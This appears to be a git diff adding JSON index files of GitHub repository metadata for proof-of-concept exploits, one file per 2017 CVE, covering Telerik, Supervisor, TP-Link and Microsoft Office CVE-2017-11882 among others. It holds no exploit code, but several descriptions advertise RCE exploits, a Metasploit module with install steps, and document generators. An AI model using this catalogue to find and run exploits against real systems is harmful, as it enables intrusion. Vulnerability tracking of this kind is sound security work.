"2024-02-17T12:00:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-11317.json b/2017/CVE-2017-11317.json new file mode 100644 index 0000000000..424a296b0e --- /dev/null +++ b/2017/CVE-2017-11317.json @@ -0,0 +1,126 @@ +[ + { + "id": 116822376, + "name": "RAU_crypto", + "full_name": "bao7uo\/RAU_crypto", + "owner": { + "login": "bao7uo", + "id": 21125224, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21125224?v=4", + "html_url": "https:\/\/github.com\/bao7uo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bao7uo\/RAU_crypto", + "description": "Telerik UI for ASP.NET AJAX File upload and .NET deserialisation exploit (CVE-2017-11317, CVE-2017-11357, CVE-2019-18935)", + "fork": false, + "created_at": "2018-01-09T13:53:57Z", + "updated_at": "2024-10-17T10:56:55Z", + "pushed_at": "2020-08-22T06:15:54Z", + "stargazers_count": 169, + "watchers_count": 169, + "has_discussions": false, + "forks_count": 48, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 48, + "watchers": 169, + "score": 0, + "subscribers_count": 9 + }, + { + "id": 550908047, + "name": "Unrestricted-File-Upload-by-Weak-Encryption-affected-versions-CVE-2017-11317-Remote-Code-Execut", + "full_name": "KasunPriyashan\/Unrestricted-File-Upload-by-Weak-Encryption-affected-versions-CVE-2017-11317-Remote-Code-Execut", + "owner": { + "login": "KasunPriyashan", + "id": 97877907, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97877907?v=4", + "html_url": "https:\/\/github.com\/KasunPriyashan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KasunPriyashan\/Unrestricted-File-Upload-by-Weak-Encryption-affected-versions-CVE-2017-11317-Remote-Code-Execut", + "description": "Arbitrary code execution analysis based on Telerik-UI. This will be done so that the article can be read by others. The document provides an in-depth explanation of the various vectors involved with Telerik-UI for ASP.NET AJAX, as well as POST requests, the architecture of ASP.NET AJAX,", + "fork": false, + "created_at": "2022-10-13T14:19:12Z", + "updated_at": "2022-10-13T14:19:12Z", + "pushed_at": "2022-10-13T14:19:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 550909457, + "name": "Telerik-UI-ASP.NET-AJAX-Exploitation", + "full_name": "KasunPriyashan\/Telerik-UI-ASP.NET-AJAX-Exploitation", + "owner": { + "login": "KasunPriyashan", + "id": 97877907, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97877907?v=4", + "html_url": "https:\/\/github.com\/KasunPriyashan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KasunPriyashan\/Telerik-UI-ASP.NET-AJAX-Exploitation", + "description": "Unrestricted File Upload by Weak Encryption affected versions (CVE-2017-11317) 2. Remote Code Execution by Insecure Deserialization - (CVE-2019-18935)", + "fork": false, + "created_at": "2022-10-13T14:21:31Z", + "updated_at": "2022-10-13T14:21:31Z", + "pushed_at": "2022-10-13T14:22:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 830495628, + "name": "CVE-2017-11317-and-CVE-2017-11357-in-Telerik", + "full_name": "hlong12042\/CVE-2017-11317-and-CVE-2017-11357-in-Telerik", + "owner": { + "login": "hlong12042", + "id": 58381595, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58381595?v=4", + "html_url": "https:\/\/github.com\/hlong12042", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hlong12042\/CVE-2017-11317-and-CVE-2017-11357-in-Telerik", + "description": null, + "fork": false, + "created_at": "2024-07-18T11:41:16Z", + "updated_at": "2024-07-18T12:40:38Z", + "pushed_at": "2024-07-18T12:40:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-11366.json b/2017/CVE-2017-11366.json new file mode 100644 index 0000000000..aaaba99480 --- /dev/null +++ b/2017/CVE-2017-11366.json @@ -0,0 +1,33 @@ +[ + { + "id": 452774894, + "name": "Codiad-CVE-2018-14009", + "full_name": "hidog123\/Codiad-CVE-2018-14009", + "owner": { + "login": "hidog123", + "id": 52358194, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52358194?v=4", + "html_url": "https:\/\/github.com\/hidog123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hidog123\/Codiad-CVE-2018-14009", + "description": "Codiad through 2.8.4 allows Remote Code Execution, a different vulnerability than CVE-2017-11366 and CVE-2017-15689", + "fork": false, + "created_at": "2022-01-27T17:16:35Z", + "updated_at": "2022-01-27T17:24:31Z", + "pushed_at": "2022-01-27T17:36:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-11427.json b/2017/CVE-2017-11427.json new file mode 100644 index 0000000000..46b221d604 --- /dev/null +++ b/2017/CVE-2017-11427.json @@ -0,0 +1,33 @@ +[ + { + "id": 123645081, + "name": "CVE-2017-11427-DEMO", + "full_name": "CHYbeta\/CVE-2017-11427-DEMO", + "owner": { + "login": "CHYbeta", + "id": 18642224, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18642224?v=4", + "html_url": "https:\/\/github.com\/CHYbeta", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CHYbeta\/CVE-2017-11427-DEMO", + "description": "The Demo for CVE-2017-11427", + "fork": false, + "created_at": "2018-03-03T00:29:22Z", + "updated_at": "2020-02-12T13:05:42Z", + "pushed_at": "2018-03-03T04:40:10Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-11503.json b/2017/CVE-2017-11503.json new file mode 100644 index 0000000000..c4e0c2fe0d --- /dev/null +++ b/2017/CVE-2017-11503.json @@ -0,0 +1,33 @@ +[ + { + "id": 126858445, + "name": "download", + "full_name": "wizardafric\/download", + "owner": { + "login": "wizardafric", + "id": 37772539, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37772539?v=4", + "html_url": "https:\/\/github.com\/wizardafric", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wizardafric\/download", + "description": "(https:\/\/web.nvd.nist.gov\/view\/vuln\/detail?vulnId=CVE-2017-11503", + "fork": false, + "created_at": "2018-03-26T16:35:17Z", + "updated_at": "2018-03-27T13:50:20Z", + "pushed_at": "2018-03-27T13:50:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-11519.json b/2017/CVE-2017-11519.json new file mode 100644 index 0000000000..1bb6b34805 --- /dev/null +++ b/2017/CVE-2017-11519.json @@ -0,0 +1,33 @@ +[ + { + "id": 137827933, + "name": "tplink-CVE-2017-11519", + "full_name": "vakzz\/tplink-CVE-2017-11519", + "owner": { + "login": "vakzz", + "id": 26542189, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26542189?v=4", + "html_url": "https:\/\/github.com\/vakzz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vakzz\/tplink-CVE-2017-11519", + "description": "POC for TP-Link Archer C9 - Admin Password Reset and RCE (CVE-2017-11519)", + "fork": false, + "created_at": "2018-06-19T02:04:38Z", + "updated_at": "2020-03-26T01:19:54Z", + "pushed_at": "2018-06-19T02:12:35Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-11610.json b/2017/CVE-2017-11610.json new file mode 100644 index 0000000000..9e6ddc5783 --- /dev/null +++ b/2017/CVE-2017-11610.json @@ -0,0 +1,64 @@ +[ + { + "id": 219141017, + "name": "CVE-2017-11610", + "full_name": "ivanitlearning\/CVE-2017-11610", + "owner": { + "login": "ivanitlearning", + "id": 52420671, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52420671?v=4", + "html_url": "https:\/\/github.com\/ivanitlearning", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ivanitlearning\/CVE-2017-11610", + "description": "Standalone Python ≥3.6 RCE Unauthenticated exploit for Supervisor 3.0a1 to 3.3.2", + "fork": false, + "created_at": "2019-11-02T10:58:12Z", + "updated_at": "2019-11-05T10:54:34Z", + "pushed_at": "2019-11-05T10:54:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 323575291, + "name": "CVE-2017-11610", + "full_name": "yaunsky\/CVE-2017-11610", + "owner": { + "login": "yaunsky", + "id": 48243087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48243087?v=4", + "html_url": "https:\/\/github.com\/yaunsky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yaunsky\/CVE-2017-11610", + "description": "Supervisord远程命令执行漏洞脚本", + "fork": false, + "created_at": "2020-12-22T09:08:49Z", + "updated_at": "2022-03-20T05:21:38Z", + "pushed_at": "2020-12-22T09:12:07Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-11611.json b/2017/CVE-2017-11611.json new file mode 100644 index 0000000000..78b86a5331 --- /dev/null +++ b/2017/CVE-2017-11611.json @@ -0,0 +1,33 @@ +[ + { + "id": 101361478, + "name": "Wolfcms-v0.8.3.1-xss-POC-by-Provensec-llc", + "full_name": "faizzaidi\/Wolfcms-v0.8.3.1-xss-POC-by-Provensec-llc", + "owner": { + "login": "faizzaidi", + "id": 12153050, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12153050?v=4", + "html_url": "https:\/\/github.com\/faizzaidi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/faizzaidi\/Wolfcms-v0.8.3.1-xss-POC-by-Provensec-llc", + "description": "WolfCMS-v0.8.3.1 Cross Site Scripting(XSS) Assigned CVE Number: CVE-2017-11611", + "fork": false, + "created_at": "2017-08-25T03:19:05Z", + "updated_at": "2020-07-17T05:22:39Z", + "pushed_at": "2017-08-25T03:19:37Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-11774.json b/2017/CVE-2017-11774.json new file mode 100644 index 0000000000..cdf0709490 --- /dev/null +++ b/2017/CVE-2017-11774.json @@ -0,0 +1,33 @@ +[ + { + "id": 202635955, + "name": "SniperRoost", + "full_name": "devcoinfet\/SniperRoost", + "owner": { + "login": "devcoinfet", + "id": 34756993, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34756993?v=4", + "html_url": "https:\/\/github.com\/devcoinfet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/devcoinfet\/SniperRoost", + "description": "used to generate a valid attack chain to exploit CVE-2017-11774 tied to iranian apt only reasearch poc dont use for harm please", + "fork": false, + "created_at": "2019-08-16T01:25:13Z", + "updated_at": "2020-02-12T10:05:32Z", + "pushed_at": "2019-08-16T01:28:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-11783.json b/2017/CVE-2017-11783.json new file mode 100644 index 0000000000..4303e639ce --- /dev/null +++ b/2017/CVE-2017-11783.json @@ -0,0 +1,33 @@ +[ + { + "id": 146827280, + "name": "CVE-2017-11783", + "full_name": "Sheisback\/CVE-2017-11783", + "owner": { + "login": "Sheisback", + "id": 8948193, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8948193?v=4", + "html_url": "https:\/\/github.com\/Sheisback", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sheisback\/CVE-2017-11783", + "description": "1day Exploit by sheisback", + "fork": false, + "created_at": "2018-08-31T01:48:29Z", + "updated_at": "2022-07-15T07:06:20Z", + "pushed_at": "2020-11-05T05:00:45Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 4, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-11826.json b/2017/CVE-2017-11826.json new file mode 100644 index 0000000000..93e77b2024 --- /dev/null +++ b/2017/CVE-2017-11826.json @@ -0,0 +1,33 @@ +[ + { + "id": 120934470, + "name": "CVE-2017-11826", + "full_name": "thatskriptkid\/CVE-2017-11826", + "owner": { + "login": "thatskriptkid", + "id": 8300184, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8300184?v=4", + "html_url": "https:\/\/github.com\/thatskriptkid", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thatskriptkid\/CVE-2017-11826", + "description": "Exploit for CVE-2017-11826", + "fork": false, + "created_at": "2018-02-09T17:20:53Z", + "updated_at": "2022-03-12T23:30:36Z", + "pushed_at": "2020-05-18T20:53:40Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 8, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-11882.json b/2017/CVE-2017-11882.json new file mode 100644 index 0000000000..f5a1ebde1e --- /dev/null +++ b/2017/CVE-2017-11882.json @@ -0,0 +1,1045 @@ +[ + { + "id": 111305094, + "name": "cve-2017-11882", + "full_name": "zhouat\/cve-2017-11882", + "owner": { + "login": "zhouat", + "id": 8078184, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8078184?v=4", + "html_url": "https:\/\/github.com\/zhouat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zhouat\/cve-2017-11882", + "description": null, + "fork": false, + "created_at": "2017-11-19T14:57:41Z", + "updated_at": "2017-11-21T09:11:26Z", + "pushed_at": "2017-11-18T14:21:03Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 111435936, + "name": "CVE-2017-11882", + "full_name": "embedi\/CVE-2017-11882", + "owner": { + "login": "embedi", + "id": 24190344, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24190344?v=4", + "html_url": "https:\/\/github.com\/embedi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/embedi\/CVE-2017-11882", + "description": "Proof-of-Concept exploits for CVE-2017-11882", + "fork": false, + "created_at": "2017-11-20T16:35:30Z", + "updated_at": "2024-09-10T06:16:46Z", + "pushed_at": "2017-11-29T16:13:23Z", + "stargazers_count": 493, + "watchers_count": 493, + "has_discussions": false, + "forks_count": 183, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 183, + "watchers": 493, + "score": 0, + "subscribers_count": 39 + }, + { + "id": 111505810, + "name": "CVE-2017-11882", + "full_name": "Ridter\/CVE-2017-11882", + "owner": { + "login": "Ridter", + "id": 6007471, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6007471?v=4", + "html_url": "https:\/\/github.com\/Ridter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ridter\/CVE-2017-11882", + "description": "CVE-2017-11882 from https:\/\/github.com\/embedi\/CVE-2017-11882", + "fork": false, + "created_at": "2017-11-21T05:55:53Z", + "updated_at": "2024-11-12T08:13:46Z", + "pushed_at": "2017-11-29T03:33:53Z", + "stargazers_count": 540, + "watchers_count": 540, + "has_discussions": false, + "forks_count": 252, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 252, + "watchers": 540, + "score": 0, + "subscribers_count": 28 + }, + { + "id": 111525857, + "name": "2017-11882_Generator", + "full_name": "BlackMathIT\/2017-11882_Generator", + "owner": { + "login": "BlackMathIT", + "id": 26303870, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26303870?v=4", + "html_url": "https:\/\/github.com\/BlackMathIT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BlackMathIT\/2017-11882_Generator", + "description": "CVE-2017-11882 File Generator PoC", + "fork": false, + "created_at": "2017-11-21T09:15:28Z", + "updated_at": "2024-08-12T19:34:13Z", + "pushed_at": "2017-11-22T08:38:18Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 23, + "watchers": 35, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 111566147, + "name": "CVE-2017-11882", + "full_name": "rip1s\/CVE-2017-11882", + "owner": { + "login": "rip1s", + "id": 12728984, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12728984?v=4", + "html_url": "https:\/\/github.com\/rip1s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rip1s\/CVE-2017-11882", + "description": "CVE-2017-11882 Exploit accepts over 17k bytes long command\/code in maximum.", + "fork": false, + "created_at": "2017-11-21T15:22:41Z", + "updated_at": "2024-11-12T07:45:58Z", + "pushed_at": "2017-12-06T12:47:31Z", + "stargazers_count": 325, + "watchers_count": 325, + "has_discussions": false, + "forks_count": 95, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-11882", + "exploit", + "rtf", + "shellcode" + ], + "visibility": "public", + "forks": 95, + "watchers": 325, + "score": 0, + "subscribers_count": 18 + }, + { + "id": 111585219, + "name": "CVE-2017-11882-metasploit", + "full_name": "0x09AL\/CVE-2017-11882-metasploit", + "owner": { + "login": "0x09AL", + "id": 25826294, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25826294?v=4", + "html_url": "https:\/\/github.com\/0x09AL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x09AL\/CVE-2017-11882-metasploit", + "description": "This is a Metasploit module which exploits CVE-2017-11882 using the POC released here : https:\/\/embedi.com\/blog\/skeleton-closet-ms-office-vulnerability-you-didnt-know-about.", + "fork": false, + "created_at": "2017-11-21T18:17:28Z", + "updated_at": "2024-09-09T11:48:19Z", + "pushed_at": "2017-11-21T20:34:57Z", + "stargazers_count": 98, + "watchers_count": 98, + "has_discussions": false, + "forks_count": 62, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 62, + "watchers": 98, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 111601525, + "name": "ABC", + "full_name": "HZachev\/ABC", + "owner": { + "login": "HZachev", + "id": 33879843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33879843?v=4", + "html_url": "https:\/\/github.com\/HZachev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HZachev\/ABC", + "description": "CVE-2017-11882", + "fork": false, + "created_at": "2017-11-21T21:07:57Z", + "updated_at": "2017-11-21T21:07:57Z", + "pushed_at": "2017-11-21T22:04:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 111619944, + "name": "CVE-2017-11882", + "full_name": "starnightcyber\/CVE-2017-11882", + "owner": { + "login": "starnightcyber", + "id": 19260696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19260696?v=4", + "html_url": "https:\/\/github.com\/starnightcyber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/starnightcyber\/CVE-2017-11882", + "description": "CVE-2017-11882 exploitation", + "fork": false, + "created_at": "2017-11-22T01:11:39Z", + "updated_at": "2024-08-12T19:34:15Z", + "pushed_at": "2017-11-28T03:06:32Z", + "stargazers_count": 43, + "watchers_count": 43, + "has_discussions": false, + "forks_count": 73, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-11882" + ], + "visibility": "public", + "forks": 73, + "watchers": 43, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 111637919, + "name": "CVE-2017-11882", + "full_name": "Grey-Li\/CVE-2017-11882", + "owner": { + "login": "Grey-Li", + "id": 33873392, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33873392?v=4", + "html_url": "https:\/\/github.com\/Grey-Li", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Grey-Li\/CVE-2017-11882", + "description": null, + "fork": false, + "created_at": "2017-11-22T04:53:44Z", + "updated_at": "2017-11-22T04:54:38Z", + "pushed_at": "2017-11-22T04:54:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 111887551, + "name": "CVE-2017-11882-for-Kali", + "full_name": "legendsec\/CVE-2017-11882-for-Kali", + "owner": { + "login": "legendsec", + "id": 13389492, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13389492?v=4", + "html_url": "https:\/\/github.com\/legendsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/legendsec\/CVE-2017-11882-for-Kali", + "description": "# CVE-2017-11882-metasploit This is a Metasploit module which exploits CVE-2017-11882 using the POC below: https:\/\/embedi.com\/blog\/skeleton-closet-ms-office-vulnerability-you-didnt-know-about. ## Installation 1) Copy the cve_2017_11882.rb to \/usr\/share\/metasploit-framework\/modules\/exploits\/windows\/local\/ 2) Copy the cve-2017-11882.rtf to \/usr\/share\/metasploit-framework\/data\/exploits\/ This module is a quick port to Metasploit and uses mshta.exe to execute the payload. There are better ways to implement this module and exploit but will update it as soon as I have the time.", + "fork": false, + "created_at": "2017-11-24T07:11:13Z", + "updated_at": "2023-06-08T10:38:50Z", + "pushed_at": "2017-11-24T07:11:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 111904379, + "name": "cve-2017-11882", + "full_name": "CSC-pentest\/cve-2017-11882", + "owner": { + "login": "CSC-pentest", + "id": 33954862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33954862?v=4", + "html_url": "https:\/\/github.com\/CSC-pentest", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CSC-pentest\/cve-2017-11882", + "description": null, + "fork": false, + "created_at": "2017-11-24T10:09:49Z", + "updated_at": "2017-11-24T10:09:49Z", + "pushed_at": "2017-11-24T10:13:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 112133932, + "name": "CVE-2017-11882-", + "full_name": "Shadowshusky\/CVE-2017-11882-", + "owner": { + "login": "Shadowshusky", + "id": 31649758, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31649758?v=4", + "html_url": "https:\/\/github.com\/Shadowshusky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Shadowshusky\/CVE-2017-11882-", + "description": null, + "fork": false, + "created_at": "2017-11-27T01:50:44Z", + "updated_at": "2023-12-06T03:16:35Z", + "pushed_at": "2017-11-27T01:50:52Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 117080574, + "name": "CVE-2018-0802", + "full_name": "rxwx\/CVE-2018-0802", + "owner": { + "login": "rxwx", + "id": 2202542, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2202542?v=4", + "html_url": "https:\/\/github.com\/rxwx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rxwx\/CVE-2018-0802", + "description": "PoC Exploit for CVE-2018-0802 (and optionally CVE-2017-11882)", + "fork": false, + "created_at": "2018-01-11T09:43:46Z", + "updated_at": "2024-09-27T06:14:01Z", + "pushed_at": "2018-02-28T12:32:54Z", + "stargazers_count": 270, + "watchers_count": 270, + "has_discussions": false, + "forks_count": 133, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 133, + "watchers": 270, + "score": 0, + "subscribers_count": 19 + }, + { + "id": 117234193, + "name": "RTF_11882_0802", + "full_name": "Ridter\/RTF_11882_0802", + "owner": { + "login": "Ridter", + "id": 6007471, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6007471?v=4", + "html_url": "https:\/\/github.com\/Ridter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ridter\/RTF_11882_0802", + "description": "PoC for CVE-2018-0802 And CVE-2017-11882", + "fork": false, + "created_at": "2018-01-12T11:38:33Z", + "updated_at": "2024-08-12T19:35:27Z", + "pushed_at": "2018-01-12T11:42:29Z", + "stargazers_count": 166, + "watchers_count": 166, + "has_discussions": false, + "forks_count": 67, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 67, + "watchers": 166, + "score": 0, + "subscribers_count": 9 + }, + { + "id": 117637164, + "name": "CVE-2017-11882", + "full_name": "likekabin\/CVE-2017-11882", + "owner": { + "login": "likekabin", + "id": 2469038, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2469038?v=4", + "html_url": "https:\/\/github.com\/likekabin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/likekabin\/CVE-2017-11882", + "description": null, + "fork": false, + "created_at": "2018-01-16T05:47:47Z", + "updated_at": "2018-01-16T05:47:59Z", + "pushed_at": "2018-01-16T05:47:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 117637270, + "name": "CVE-2018-0802_CVE-2017-11882", + "full_name": "likekabin\/CVE-2018-0802_CVE-2017-11882", + "owner": { + "login": "likekabin", + "id": 2469038, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2469038?v=4", + "html_url": "https:\/\/github.com\/likekabin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/likekabin\/CVE-2018-0802_CVE-2017-11882", + "description": null, + "fork": false, + "created_at": "2018-01-16T05:49:01Z", + "updated_at": "2024-08-12T19:35:32Z", + "pushed_at": "2018-01-16T05:49:10Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 130633082, + "name": "CVE-2017-11882-Possible-Remcos-Malspam", + "full_name": 